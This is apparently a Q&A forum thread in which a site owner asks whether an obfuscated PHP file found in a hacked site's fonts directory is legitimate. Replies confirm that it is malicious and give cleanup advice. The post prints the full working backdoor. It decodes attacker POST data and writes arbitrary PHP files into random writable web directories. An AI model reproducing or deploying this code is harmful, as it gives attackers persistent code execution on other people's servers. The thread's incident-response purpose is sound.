# My site was hacked, is this code in the fonts directory part of the hack?

Tags: php, fonts

This code is in a file named: gmkcpqob.php

here is the code, minus the php tag:

```
  $oypvn = "mhrnxofglzdzgfib";$tegfzuin = "";foreach ($_POST as $geommmgv => $wqslp){if (strlen($geommmgv) == 16 and substr_count($wqslp, "%") > 10){xhslwtou($geommmgv, $wqslp);}}function xhslwtou($geommmgv, $btwnqryh){global $tegfzuin;$tegfzuin = $geommmgv;$btwnqryh = str_split(rawurldecode(str_rot13($btwnqryh)));function syeghivd($yyxmmntjc, $geommmgv){global $oypvn, $tegfzuin;return $yyxmmntjc ^ $oypvn[$geommmgv % strlen($oypvn)] ^ $tegfzuin[$geommmgv % strlen($tegfzuin)];}$btwnqryh = implode("", array_map("syeghivd", array_values($btwnqryh), array_keys($btwnqryh)));$btwnqryh = @unserialize($btwnqryh);if (@is_array($btwnqryh)){$geommmgv = array_keys($btwnqryh);$btwnqryh = $btwnqryh[$geommmgv[0]];if ($btwnqryh === $geommmgv[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function wopxn($lomiyocir) {static $isgwkoi = array();$cdqpwpimg = glob($lomiyocir . '/*', GLOB_ONLYDIR);if (count($cdqpwpimg) > 0) {foreach ($cdqpwpimg as $lomiyoc){if (@is_writable($lomiyoc)){$isgwkoi[] = $lomiyoc;}}}foreach ($cdqpwpimg as $lomiyocir) wopxn($lomiyocir);return $isgwkoi;}$nuzkzv = $_SERVER["DOCUMENT_ROOT"];$cdqpwpimg = wopxn($nuzkzv);$geommmgv = array_rand($cdqpwpimg);$yttwcfcb = $cdqpwpimg[$geommmgv] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($yttwcfcb, $btwnqryh);echo "http://" . $_SERVER["HTTP_HOST"] . substr($yttwcfcb, strlen($nuzkzv));exit();}}}
```

do you know if this is a legit font file?
or is it part of the hack?

The other hacked files are all different, so if this is part of it, then it is very different than all of the other files.
the hack appears to be malware. they are calling a .ico file, which I decoded, but is still very complex.

I'd appreciate any feedback if you know if this is legit or not.

Thanks,
-Richard

I've searched google but maybe they put unique names, not sure.

Comment: Yes. That script allows an attacker to upload arbitrary files to random writable directories.

Comment: Thank you. I appreciate that. I'll remove it :) thanks.

Comment: @Rich You should nuke the server and start over.  You can't reliably just clean these files up yourself.  You have no way of knowing how deep it goes.  The only thing you can do is wipe it down to bare metal and redeploy your code from your version control system.

Comment: Looks totally legit to me... Not.

Comment: This is definite a hack. Remove the file as soon as possible. Also you'd need to scan all your source code to find malicious code that might have been injected, or other malicious file(s) that might have been uploaded.

Comment: I did I scanned for files on shell using grep, I found tons and tons, I cleaned them all up. removed ones I know I did not use or create myself. found all the .ico files it calls and removed those, and found the few like the ones I showed here, and removed those completely. then had my host scan the whole website for malware and it found 2 I did not see, and quarantined them. :) so should be good now. plus I installed a wp plugin that will let me know of any files changes, it tracks everything.